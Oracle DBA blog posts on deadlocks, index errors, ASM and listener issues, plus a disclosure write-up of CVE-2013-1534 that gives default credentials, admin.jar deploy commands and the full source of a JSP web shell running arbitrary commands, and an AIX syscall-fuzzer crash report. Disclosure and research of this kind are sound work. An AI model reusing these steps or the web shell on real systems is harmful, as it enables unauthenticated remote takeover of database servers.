Bug/ORA-00060 deadlock during concurrent Drop Table (purge) and INSERT

March 24th, 2014

I’ve just found a rather new and not known bug during analysis for one of hangs in production system. This research ended up in full reproducible test case against the following Oracle versions on x86_64:

  • 11.2.0.3.8
  • 11.2.0.4.0
  • 12.1.0.1.0

First, let’s prepare the experimental schema to trigger this bug, we create TRANS table and the CHILD one, the target objective is to drop CHILD table from the system to release space:

drop table trans CASCADE CONSTRAINTS purge;
drop table child CASCADE CONSTRAINTS purge;
drop sequence trans_seq;
drop sequence child_seq;

CREATE TABLE TRANS (
  ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  CDATE DATE NOT NULL,
  TXT VARCHAR2(64)
) PARTITION BY RANGE (cdate) INTERVAL (NUMTOYMINTERVAL(1,'MONTH'))
(
   PARTITION p1 values LESS THAN (TO_DATE('01-NOV-2010','DD-MON-YYYY'))
);

CREATE TABLE CHILD (
  CHILD_ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  TRANS_ID NUMBER(10,0) NOT NULL ENABLE,
  TXT VARCHAR2(64),
  CONSTRAINT "TRANS_ID_FK" FOREIGN KEY (TRANS_ID) REFERENCES TRANS (ID) ENABLE
);

create sequence trans_seq start with 1 increment by 1 cache 1000;
create sequence child_seq start with 269282 increment by 1 cache 1000;

create or replace procedure generate_load as
  i number;
begin
  for i in 1 .. 50000 loop
    insert into trans (id, cdate) values (trans_seq.nextval, to_date(trunc(sysdate-i)));
    commit write wait;
  end loop;
end;
/

exec generate_load;

-- load child with some vaules from parent (trans)
insert into child (child_id, trans_id) select child_seq.nextval, id from trans;
commit;

The trick is that CHILD has referential constraint to the TRANS table. Additional trick is that there are many (3-4) concurrent sessions doing concurrent simple INSERTs to that table followed immediately by COMMIT WRITE WAIT in PL/SQL loop. OK so let’s start our generator:

[oracle@t10050 fk_drop_table_locks]$ ./gen.sh
Mon Mar 24 14:44:50 CET 2014
Launching 3 workers with load.sql
...waiting to finish

When we attempt now to drop our CHILD table using this (what has been really performed by production DBA some time ago in our case):

alter session set ddl_lock_timeout=15;
drop table child purge;

In the experiment we have end up in INSERT sessions throwing famous ORA-00060 errors. You might wonder

BEGIN generate_load; END;
BEGIN generate_load; END;

*
*
ERROR at line 1:
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1
ORA-06512: at line 1

Elapsed: 00:00:15.06
Elapsed: 00:00:15.06
BEGIN generate_load; END;

*
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1

Elapsed: 00:00:15.10

Of course alert log will be full of deadlock errors and the sample single session deadlock graph looks similiar:

*** 2014-03-24 14:25:23.056
DEADLOCK DETECTED ( ORA-00060 )

[Transaction Deadlock]

The following deadlock is not an ORACLE error. It is a
deadlock due to user error in the design of an application
or from issuing incorrect ad-hoc SQL. The following
information may aid in determining the deadlock:

Deadlock graph:
                       ---------Blocker(s)--------  ---------Waiter(s)---------
Resource Name          process session holds waits  process session holds waits
TM-0000a079-00000000        20     138    SX             24       6           S
TM-0000a07c-00000000        24       6     X             20     138          SX

session 138: DID 0001-0014-00000BF2     session 6: DID 0001-0018-00000055
session 6: DID 0001-0018-00000055       session 138: DID 0001-0014-00000BF2 

Rows waited on:
  Session 138: obj - rowid = 0000A07C - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41084, file - 0, block - 0, slot - 0)
  Session 6: obj - rowid = 0000A079 - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41081, file - 0, block - 0, slot - 0)

From this we can say that two sessions {138,6} endup in rivilaization for single two TM enqueues but in incompatibile way for two tables. Session 138 was holding SX lock on TM enqueue for table 0000A079 (TRANS) – i.e. was protecting the table in shared exclusvie mode, because wanted to insert – and in parallel to that, session 6 was holding X lock on TM enqueue for table 0000a07c (CHILD) – i.e. was holding exclusive access to whole table , so it was that tried to DROP it. In the next processing cycles:

  • session 6 (the one with DROP TABLE PURGE) tried to accquire shared lock S on table TRANS due tue to FK constraint, and started waiting for it (S and SX are not compatibile according to MetaLink note Id Detecting and Resolving Locking Conflicts and Ora-00060 errors (Doc ID 15476.1))
  • session 138 (the one doing INSERT at the time) tried to accquire SX on the enqueue TM for table CHILD, but couldnt get it as CHILD has been eXclusivley locked by session 6
  • in the several seconds automatic DeadLock detection kicks in and kills sessions performing INSERTs causing downtime/error for application

Upon further investigation together with my DBA coworker Andrzej Nowicki and short trials and errors today, we’ve came to the conclusion that the main culprint of this error is the PURGE clause of the DROP TABLE statement. This has several interesting repercusions:

  • “DROP TABLE X PURGE” vs “DROP TABLE X” are technically two different things and the former actually does NOT results in bug.
  • Oracle parameter responsible for recyclebin affects whether “DROP TABLE X” results really in “DROP TABLE X PURGE”
  • This case is very similiar to the Bug 11693365: Concurrent Drop table and Select on Reference constraint table hangs (deadlock), however that one is stated to be fixed 12.1.0.1 (Base Release) and 11.2.0.3 (Server Patch Set), however the mentioned here bug is NOT.
  • The workarounds for bug 11693365 seem to also help here (“Disable and drop all the referential integrity constraints before dropping the child table.
    eg: alter table disable constraint ; / alter table drop constraint ; /drop table cascade constraints purge;”)

ORA-14765: when CREATE INDEX ONLINE is not really online…

March 14th, 2014

Several days ago we’ve hit in our production application an the interesting new (to me at least) Oracle error “ORA-14765: Cannot create a partition while doing a create index”. It wouldn’t be strange if it wouldn’t happen during an CREATE INDEX ONLINE operation, so therefore it indicates that ONLINE index creation is not really an ONLINE operation (sic!).

Note1: you cannot test it in SYS schema, as the defered segment creation feature on partitioned table seems to be not working for SYS (or SYSTEM tablespace) as it is dedicated for Oracle dictionary purposes only. Seems to me that this is similiar story to the enhaced-checksums always enabled for SYSTEM tablespace (hidden paramter _db_always_check_system_ts which stands for “Always perform block check and checksum for System tablespace”) etc.

Note2: the key in order to get the error is to have parameter deferred_segment_creation set to TRUE, which is pretty recommended if you want to avoid space waste, starting with 11.2g, as it allocates at minimum 8MB initial extent per (sub)partition segment.

Note3: tested only on 11.2.0.3.6 and 11.2.0.3.8.

After a little playing here are the steps to reproduce it:

DBA1@test3> create table t1 (
    id number primary key,
    ts	TIMESTAMP,
    txt varchar2(64)
) partition by range (ts)  interval (NUMTOYMINTERVAL(1, 'MONTH'))
(
  partition p1 values less than (TO_DATE('01.01.2000', 'DD.MM.YYYY')),
  partition p2000_02 values less than (TO_DATE('01.02.2000', 'DD.MM.YYYY')),
  partition p2000_03 values less than (TO_DATE('01.03.2000', 'DD.MM.YYYY')),
  partition p2000_04 values less than (TO_DATE('01.04.2000', 'DD.MM.YYYY')),
  partition p2000_05 values less than (TO_DATE('01.05.2000', 'DD.MM.YYYY')),
  partition p2000_06 values less than (TO_DATE('01.06.2000', 'DD.MM.YYYY'))
); 

Table created.

DBA1@test3> select table_name, segment_created from dba_tables where table_name='T1';

TABLE_NAME                     SEG
------------------------------ ---
T1                             N/A

DBA1@test3> select partition_name, segment_created from dba_tab_partitions where table_name='T1';

PARTITION_NAME                 SEGM
------------------------------ ----
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO

6 rows selected.

DBA1@test3>

Now add a very large single current partition that will take some time :

DBA1@test3> insert  /*+ APPEND NOLOGGING */ into t1 (id, ts, txt) SELECT level, sysdate, 'blah' FROM dual CONNECT BY LEVEL <= 2500000;

2500000 rows created.

DBA1@test3> commit;

Commit complete.

DBA1@test3>

Actually so far we have partition with segment_size approximatly of ~73MB in case of 8kB db blocks.

DBA1@test3> select p.partition_name, p.segment_created, s.bytes/1024 kb from dba_tab_partitions p left join dba_segments s on (p.partition_name=s.partition_name and p.table_name=s.segment_name) where p.table_name='T1' order by 2,1;

PARTITION_NAME                 SEGM         KB
------------------------------ ---- ----------
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO
SYS_P17066                     YES       73728

7 rows selected.

Now we start building online local index in our 1st session using “create index t1_i1 on t1 (ts, txt) local online”, immedietly followed by an attempt to insert single row into one of P2000_xx partition (which are without inititalized backing them segment at this point):

DBA1@test3> insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest');
insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest')
            *
ERROR at line 1:
ORA-14765: Cannot create a partition while doing a create index

DBA1@test3>

Summary: CREATE INDEX ONLINE is not fully compatibile with sessions performing DML transaction against (sub)partitions that doesn’t come with pre-allocated segments. There seems to be very likley possibility to run into ORA-14765 for Oracle transaction systems especially creating numerous automatically managed subpartitions based on some template (like Interval Range partitions that are subpartitioned by ID). Of course you may want to avoid defered segment creation (and sacrifise a lot of storage space) or live with the risks of hitting those errors during building indexes (hopefully application might just retry at later stage).

A new completley unsupported way of increasing ORAPWD entries

March 14th, 2014

FYI, i’ve just “invented” a completley new way of increasing capacity of orapwd files online that does not require knowing the SYS password (this is required once you hit ORA-1996, after trying to grant addiitonal SYSDBA). As you probably know there is hard limit of entries set when creating new orapw file and in addition it requires changing SYS password, apparently this seems to work (TM) but dont try this at home or any production system:

[oracle@t10050 dbs]$ cp orapwdtest4  orapwdtest4.old # make backup
[oracle@t10050 dbs]$ ls -l orapwdtes4 # save the filesize in bytes as SIZE1
[oracle@t10050 dbs]$ orapwd file=/tmp/remove entries=20
Enter password for SYS: anything
[oracle@t10050 dbs]$ ls -l /tmp/remove # file size will be approx 3584 bytes on Linux x86_64, if you compare it to the default orapwd , you will realize it is bigger by 2048 bytes
[oracle@t10050 dbs]$ dd if=/dev/zero of=/tmp/empty.2k bs=1k count=2
[oracle@t10050 dbs]$ cat /tmp/empty.2k >> orapwdtest4

Done! Brief tests shows that it works and you can add more working SYSDBA accounts, removal works ok, but again DO NOT TRY IT ON PRODUCTION as the internal orapwd structure is unknown to me ;)

CVE-2013-1534: remote command execution on Oracle RAC (Grid Infrastructure >= 11.2.0.[23].0 till PSU/CPU Apr2013)

January 23rd, 2014

In April 2013 Oracle fixed CVE-2013-1534 an attack that I’m going to describe here as the guy who originally found it in February 2012 (it was an 0-day for more than a year). For official information please go here Critical Patch Update April 2013. One thing though i do not agree with Oracle that it scored it with score 7.5. This statement goes like this “For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.” Basically this is remote attack that gains Oracle Grid Infrastructure owner privileges (basically “oracle”/”dba” in 99% cases) on clustered (RAC) Oracle databases, which gives you access in read/write mode to *all* data. Here I’m following responsible disclosure (vendor notified, fixed, clients alerted) … many, many months later I think all responsible people who care have already patched their Oracle RAC systems… for Patch Set 11.2.0.3.x this means it has been fixed via Grid Infrastructure + DB PSU (PatchSetUpdate) >= 11.2.0.3.6 (current PSU is 11.2.0.3.9; for 11.2.0.3.6 the recommended Oracle Alert docId is 1525152.1: Patch Set Update and Critical Patch Update April 2013 Availability Document).

Oracle starting in release of Grid Infrastructure 11gR2 (technically 11.2.0.1) added something like Quality of Service (QoS) for Databases which in practice gives ability for DBAs to better utilize usage of resource between nodes in cluster in compatibility with business requirements. SLA are being managed by the newly introduced QoS functionality by placing workloads on “server pools”. QoS in 11.2.0.1 was not full activated but starting in Grid Infrastructure 11.2.0.2 it is online by default, even without confirmation, etc. It is also being activated by default on any upgrade.

The QoS on RAC/Grid Infrastructure is partially being implemented by embedded Oracle Containers for Java (OC4J).

qosadmin account (with always default pw of “oracle112″ per Oracle documentation on every install) has always an oc4j-administrators role assigned in /u01/app/11.2.0/grid/oc4j/j2ee/home/OC4J_DBWLM_config ($GRID_HOME/oc4j/j2ee/home/OC4J_DBWLM_config) in file system-jazn-data.xml (JAZN stands for Java AuthoriZatioN). The same security configuration file is also being used as place to control of whether username:password pair is authorized to deploy any J2EE application.

This means that OC4J is prone to arbitrary command execution on any Oracle clustered (RAC) database running at least on top of Oracle Clusterware (AKA Grid Infrastructure) >= 11.2.0.2, until CPU (PSU) April 2013 has been applied. This affects both customers using QoS and those not using it. The reason is because OC4J service (serving HTTP interface over port 8888) is always and by definition enabled. The attack would by definition use “qosadmin” account… The QoS for RAC documentation (which nobody does read because it is “new” feature and by definition nobody uses nothing in production like this) states that the password for “qosadmin” should be changed because it may be used for QoS-related functionality. The remaining functionality seems to be not enabled because it was not configured… but there’s more.

What’s more interesting is that there is second account named “oc4jadmin” (a typical default OC4J admin), after brute-forcing it also appears to be set to “oracle112″… on every installation out there… and you won’t find a single line in official documentation for RAC that this “backdoor” should be disabled. So in summary every RAC >= 11.2.0.2.0 on this planet has the same passwords set for uploading J2EE applications remotely over RMI (Java thing). The oc4jadmin account is also assigned the oc4j-administrators role.

Some more details:
a) platform independent (100% success rate) exploitation vector
b) arbitrary command execution
c) gives UID of Oracle Grid Infrastructure software owner (typically “oracle” [1] or “grid” [2])
d) affects RAC >= 11.2.0.2, >= 11.2.0.3, has been tested on
[*] 11.2.0.2.0 (linux x86_64),
[*] 11.2.0.3.0 (linux x86_64),
[*] 11.2.0.3.1 // CPU Jan2012
[*] 11.2.0.3.2 // CPU Apr2012
[*] 11.2.0.3.5 // CPU Jan2013
e) so by definition it will also work against flagship Oracle Exadata “Unbreakable” Database Machine (http://www.oracle.com/us/products/database/exadata/overview/index.html) as it utilizes Oracle RAC/Grid Infrastructure
f) this thing is remote
g) this thing does NOT require any sort of authentication (just plain TCP/IP connectivity to the servers is enough)
h) vulnerability is present in any installation of Oracle Grid Infrastructure >= 11.2.0.2.0
i) no social engineering is required at all
j) remote ports 23792 and 8888 needs to be reachable to at least single RAC node (the one running the RMI service)
k) it does NOT work against Oracle Restart (single server non-RAC Grid Infrastructure installation)

[1] – by being “oracle” UNIX/Linux user one can connect “/ AS SYSDBA” so it is full compromise of data (including modification). Additionally because it is compromise giving shell access it is very easy to also defeat Oracle Database Vault (additional option for segregation of DBAs from users – think in terms of MAC vs DAC [4]). If you are interested in defeating Oracle Databases with Vault option then I recommend you the following link http://jakub.wartak.pl/blog/?p=92 :)

[2] – when a new feature “Role Separation” introduced in 11gR2 [separates ASM/Grid/Clusterware admins from DBAs] is deployed, which is very rare, it is still possible to get root, I’ll blog about it in future. That’s why probably Oracle scored it CVSS 7.5, but the main point is it is very rare to see separated Grid Infrastructure owner from Oracle RDBMS Home owner

….ooooOOOO Exploitation Demonstration OOOOoooo…..

OC4J provides a command-line utility, admin.jar and admin_client.jar. You can use any of them however I’ve only tested admin.jar (which of course is installed with any OC4J, RAC >= 11.2.0.2.0 software too). Both JARs are actually just simple tools to upload single EAR file and reconfigure remote OC4J so that is starts serving requests for certain uploaded applications under specific URLs. We are going to upload cmd.ear :) The best documentation on them comes directly from Oracle e.g. here
http://docs.oracle.com/cd/B31017_01/web.1013/b28951/overview.htm#CJAJHJIA

The easiest way to get the admin.jar (however I’ve used the one coming with RAC) is to download it from Oracle OC4J download page as it contains “OC4J Admin Client” (link http://www.oracle.com/technetwork/middleware/ias/downloads/101310-085449.html , 3 disks, total 1.4GB). Probably you need to use admin.jar/admin_client.jar as close to the version of OC4J being attacked (e.g. usage of 9.x.x admin.jar might fail uploading to RAC >= 11.2.0.2 as the OC4J embedded there is at version 10.1.3, etc). I would recommend installing it on RHEL/OL compatible Linux distribution if possible (due to the enterprise nature of Oracle software). The other thing is that you could probably use some ready-to-run RAC VirtualMachine Linux template from Oracle (works for me under XEN). I’ve also tried the metasploit generic RMI uploaders (for JBoss if i remember correctly) but I’ve failed (perhaps it’s possible, but IMHO there are more easy ways).

Actually there are only 2 commands and 1 click to exploit this vulnerability. You do not need to write any tools/exploits, just execute several commands to upload cmd.ear onto vulnerable RAC installation due to the default passwords being deployed.

1. Deploy/upload file (exploit) to vulnerable RAC cluster
————————————————————-

Detail: java -jar admin.jar ormi://<target>:23792 qosadmin oracle112  -deploy -file <path_cmd_exploit.ear> -deploymentName cmd

e.g.:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112  -deploy -file ~/cmd.ear -deploymentName cmd
Uploading file /root/cmd.ear to oc4j server side
[ 2012-06-08 08:14:39.290 EDT ] Application Deployer for cmd STARTS.
[ 2012-06-08 08:14:40.850 EDT ] Copy the archive to /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear
[ 2012-06-08 08:14:40.879 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear begins...
[ 2012-06-08 08:14:40.881 EDT ] Unpacking cmd.ear
[ 2012-06-08 08:14:40.887 EDT ] Done unpacking cmd.ear
[ 2012-06-08 08:14:40.895 EDT ] Unpacking cmd.war
[ 2012-06-08 08:14:40.905 EDT ] Done unpacking cmd.war
[ 2012-06-08 08:14:40.906 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear ends...
[ 2012-06-08 08:14:40.907 EDT ] Starting application : cmd
[ 2012-06-08 08:14:40.907 EDT ] Initializing ClassLoader(s)
[ 2012-06-08 08:14:40.908 EDT ] Initializing EJB container
[ 2012-06-08 08:14:40.909 EDT ] Loading connector(s)
[ 2012-06-08 08:14:40.921 EDT ] Starting up resource adapters
[ 2012-06-08 08:14:40.921 EDT ] Initializing EJB sessions
[ 2012-06-08 08:14:40.922 EDT ] Committing ClassLoader(s)
[ 2012-06-08 08:14:40.922 EDT ] Initialize cmd begins...
[ 2012-06-08 08:14:40.927 EDT ] Initialize cmd ends...
[ 2012-06-08 08:14:40.929 EDT ] Started application : cmd
[ 2012-06-08 08:14:40.932 EDT ] Application Deployer for cmd COMPLETES. Operation time: 1642 msecs

[root@attacker home]#

2. Now we bind EAR(application/exploit) to the URL of OC4J server
————————————————————————-
Once the J2EE(EAR) application has been deployed you need to bind it to visible URL:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112 -bindWebApp cmd cmd default-web-site /cmd
[root@attacker home]#

Basically you can specify qosadmin or oc4jadmin, as I’ve stated earlier it doesn’t matter.

3. Profit!
——————————————–
OK, you need to open web-browser first and go to URL http://target:8888/cmd/cmd.jsp?cmd=id+-a , where target is one hostname of the RAC nodes

Or if you need kicking ass web GUI interface to own someone: http://RACtarget:8888/cmd/

-J.

p.s. the cmd.jsp (and EAR built from it – i’m not going to provide it) is very simple:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

ASM diskgroup with negative disk sizes

January 7th, 2014

Sometimes as DBA you will see strange signs on your way, like this one ASM +DATA diskgroup with no data, no files something taking space(notice the Total_MB != Free_MB):

ASMCMD> lsdg
State    Type    Rebal  Sector  Block       AU  Total_MB  Free_MB  Req_mir_free_MB  Usable_file_MB  Offline_disks  Voting_files  Name
MOUNTED  EXTERN  N         512   4096  1048576   4095940  3271458                0         3271458              0             N  DATA/
MOUNTED  EXTERN  N         512   4096  1048576    102398   102304                0          102304              0             N  REDO/
MOUNTED  EXTERN  N         512   4096  1048576      1019      623                0             623              0             Y  SYSTEMDG/
ASMCMD> find +DATA *
ASMCMD> ls +DATA
ASMCMD> lsdsk
Path
/dev/oracleasm/disks/DATA_05
/dev/oracleasm/disks/DATA_06
/dev/oracleasm/disks/DATA_07
/dev/oracleasm/disks/DATA_08
/dev/oracleasm/disks/DATA_09
/dev/oracleasm/disks/DATA_10
/dev/oracleasm/disks/DATA_11
/dev/oracleasm/disks/DATA_12
/dev/oracleasm/disks/DATA_13
/dev/oracleasm/disks/DATA_14
/dev/oracleasm/disks/REDO_02
/dev/oracleasm/disks/SYSTEMDG_DISK01
ASMCMD>

Rebalance won’t help, ASM logs are clear and so you are more and more confused. The situtation is a little bit awkward but one can find a negative (!) capacity (close to -2^32 value) of some ASM disks that were recently added:

ASMCMD> lsdsk -k -G DATA
Total_MB      Free_MB   OS_MB  Name       Failgroup  Failgroup_Type  Library  Label  UDID  Product  Redund   Path
  409594       409037  409594  DATA_0000  DATA_0000  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_05
  409594       408885  409594  DATA_0001  DATA_0001  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_06
  409594       408895  409594  DATA_0002  DATA_0002  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_07
  409594       408680  409594  DATA_0003  DATA_0003  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_08
  409594       408987  409594  DATA_0004  DATA_0004  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_09
  409594       408931  409594  DATA_0005  DATA_0005  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_10
  409594       409079  409594  DATA_0006  DATA_0006  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_11
  409594       408964  409594  DATA_0007  DATA_0007  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_12
  409594  -4294555512  409594  DATA_0008  DATA_0008  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_13
  409594  -4294554748  409594  DATA_0009  DATA_0009  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_14
ASMCMD>

To fix the problem one can drop the affected ASM disks, remove ASMLib labels, and the critical thing is to reinitialize/overwrite with 0 (using dd from /dev/zero) large header on the individual LUN (at least 10MB) and afterwards re-add those disks (using ASMLib) to the diskgroup using normal ALTER DISKGROUP +DG ADD DISK syntax. Afterwards you will find normal utilization in the diskgroup:

SQL> select name, state, type, total_mb, free_mb from v$asm_diskgroup;

NAME                           STATE       TYPE     TOTAL_MB    FREE_MB
------------------------------ ----------- ------ ---------- ----------
DATA                           MOUNTED     EXTERN    4095940    4090620
REDO                           MOUNTED     EXTERN     102398     102304
SYSTEMDG                       MOUNTED     EXTERN       1019        623

SQL>

Reason: probably LUN disks were not properly initialized (only 1MB has been overwritten), however no errors were found during 1st initialization. Another strange thing on so not critical development system :)

Oracle Certified Master 11g

December 3rd, 2013

Hi.

It is official now: I have successfully passed Oracle Database 11g Administrator Certified Master Exam (at the age of 28 should I add). It took long time preparing for it (years since starting career as Oracle DBA), so there were almost no internal-like blog posts.

  • It’s of the most advanced exams in IT for Senior DBAs managing mission critical 24×7 environments (blood-life of any big IT system currently).
  • The best place for information on this exam is the OCM page itself, but you are going to fully realize it after the exam
  • Costs are insane (OCA, OCP as perquisites + 3 Oracle University trainings[$$$] + cost of the 2-day exam [$$])
  • Tempo on the practical exam is insane too, there is no time left for thinking, you literally are doing stuff faster than you can think about it for 2 full days.
  • Mistakes costs a lot of time, it is all about skills and speed. If you have skills, but won’t be to perform some Exam Topic under single skill-set time even do not bother thinking about the exam itself.
  • You are not allowed to loose your data and I think it is fair to say, if you loose the database (or database availability for too long) you are out of the exam. This is tested but as I’m under NDA I will not go into details.

The stress caused by the number of tasks to be performed plus stress of doing something wrong (fear that you will damage your main production DB) plus constant stress during the exam of something random (like hardware, deliberate actions) failing create truly unique atmosphere during those 2 days… It is like 4 years of growth for Oracle-based IT system compressed into 2 days with all the obstacles and challenges.

RATE_LIMIT and Oracle RAC 11gR2?

November 4th, 2013

Oracle SQLNet/TNS connections rate limiting is an awesome way of increasing stability of Oracle databases by allowing controlling insane behavior of starting up Applicaton Servers or Middleware components that push hundredths connections to the databases and thus killing CPU on the database/server side (and impacting other critical work). The way it works is also very important, it is not just refusing connections, but accept()-ing socket, but not starting processing (just queuing the work). For more detail you can look official Oracle whitepaper, especially www.oracle.com/technetwork/database/enterprise-edition/oraclenetservices-connectionratelim-133050.pdf.

The way its working is important , because rejecting the TCP connections (via TCP FIN or TCP RST) would cause application to get “Unable to get connection” type errors, which is in most cases not something you want to achieve for various reasons. If that feature doesn’t work you won’t be able to re-implement it in different way – let’s say using Linux’s NetFilter – because you are able to rate limit TCP connections there primarily by dropping them.

You may be surprised after reading official Oracle documentation http://docs.oracle.com/cd/E11882_01/network.112/e10835/listener.htm#NETRF008 regarding rate limiting Oracle SQLNet/TNS connections is NOT supported on RAC installations. The official documentation itself is silent on this topic, but this has been confirmed via Oracle SR to support. The probable primary reason for this is that CRS in 11gR2 manages normal and SCAN listeners so you have no choice of altering Oracle managed listner.ora and endpoints_listener.ora files because they are overwritten by… but still documentation asks you to them. Clearly a conflcit here.

On RAC/CRS the listeners are supposed to be altered only via “srvctl” command. srvctl actually is just frontend because oraagent.bin daemon takes care since 11gR2 for monitoring and housekeeping listeners. The problem is that srvctl does NOT have a way to enable RATE_LIMIT, but also there is no option to alter more advanced parameters like QUEUESIZE (fortunately on Linux 2.6.x backlog depth for listen() seems to be SOMAXCONN=/proc/sys/net/core/somaxconn=128 by default), SDU, etc (those are actually being mentioned in Bug 11782958: “SRVCTL DOES NOT SUPPORT LISTENER CONFIGURATION LIKE MODIFYING QUEUESIZE, SEND/RE”, also in DocID 1292915.1 “Setting Parameters for Scan and Node Listeners on RAC, Queuesize, SDU, Ports, etc”)

Sample srvctl options for 11gR2:

[oracle@racnode1 ~]$ aso srvctl config listener -a
Name: LISTENER
Network: 1, Owner: oracle
Home: <CRS home>
  /u01/app/11.2.0/grid11203 on node(s) racnode1, racnode2
End points: TCP:1521
[oracle@racnode1 ~]$ aso srvctl modify listener -h

Modifies the configuration for the listener.

Usage: srvctl modify listener [-l <lsnr_name>] [-o <oracle_home>] [-p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"] [-u <oracle_user>] [-k <net_num>]
    -l <lsnr_name>           Listener name (default name is LISTENER)
    -o <oracle_home>         ORACLE_HOME path
    -p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"       Comma separated tcp ports or listener endpoints
    -u <oracle_user>         Oracle user
    -k <net_num>             network number (default number is 1)
    -h                       Print usage
[oracle@racnode1 ~]$

Additionally in Doc Id 1568591.1 “11gR2 Listener With RATE_LIMIT Set: Slow Connect Time and Tnsping Response Time High with TNS-1158 Error” BUG:16409926 “LISTENER MEMORY LEAK IF RATE_LIMIT IS USED AND ENFORCED FREQUENTLY” is being mentioned (still not present in 11.2.0.2.x and 11.2.0.3.x PSUs, but fixed in 12.1.0.1 and included from start in 11.2.0.4.0). Overall this feature doesn’t seem to be widely used and/or tested and doesn’t make good feelings…

CVE-2012-0723: first worlds AIX system call fuzzer and it’s interesting results

October 7th, 2013

I’ve been intrigued for a long by the so called fuzzers, I’ve wanted to give it a try on AIX some time ago. Let’s take one of the most recent AIX release that i had at that time, e.g. 6.1 Technology Level #6 Service Pack #4 (btw it works on 7.1.0.0 too):

$ oslevel -s
6100-06-04-1112
$ id
uid=100(guest) gid=100(usr)
$
$ ./ble
[After a while system reboots]

root@XYZ:# errpt -j 67145A39 -A
---------------------------------------------------------------------------
LABEL:          DUMP_STATS
Date/Time:       Fri Sep 16 05:06:17 EDT 2011
Type:            UNKN
Resource Name:   SYSDUMP
Description
SYSTEM DUMP
Detail Data
DUMP DEVICE
/dev/lv_dumplv
DUMP SIZE
             242688512
TIME
Fri Sep 16 05:04:31 2011
DUMP TYPE (1 = PRIMARY, 2 = SECONDARY)
           1
DUMP STATUS
           0
ERROR CODE
0000 0000 0000 0000
DUMP INTEGRITY
Compressed dump - Run dmpfmt with -c flag on dump after uncompressing.

FILE NAME

PROCESSOR ID
           0
root@XYZ:#

[..]

(0)> where
pvthread+011200 STACK:
[004CEB5C]rmsock+00001C (F3FCC00000000000 [??])
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9610

(0)>

On different system 6100-03-01-0921:

(0)> where
pvthread+00AF00 STACK:
[0043DCFC]rmsock+00001C (F3FC000000000000 [??])
[00003844].svc_instr+000144 ()
[kdb_get_virtual_memory] no real storage @ 2FF229D0
[10000590]10000590 ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9680
(0)>

As you can see above it attempted any random syscall but on rmsock() – executed by non privileged user – it rebooted system (because of attributes on sys0 device that cause to reboot kernel in case of kernel panic). Typical Denial of Service attack, isn’t it?

Now let’s try something more intelligent (found during the research) – using only syscall number 793 on version 6100-06-04-1112:

$ ./ble 793
using only sc=793

.. and the system is dead. In AIX kernel debugger session on dump file after reboot you can see that even the system vector call instruction handler seems to be not visible, perhaps indicating some kind of memory overwrite in kernel space. (Probably) this could be exploited with finding offset of privilege access structure handling all UID/GIDs

(0)> where
pvthread+018C00 STACK:
[0001BF00]abend_trap+000000 ()
[000C585C]xm_bad_free+00025C (??, ??, ??, ??)
[000C4F30]xmfree+0004F0 (??, ??)
[046A7868]ptx_get_ndd_tree+000088 (??, ??, ??, ??, ??)
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9640

(0)>
[..]
(0)> ppid 06400D8
              SLOT NAME     STATE      PID    PPID          ADSPACE  CL #THS

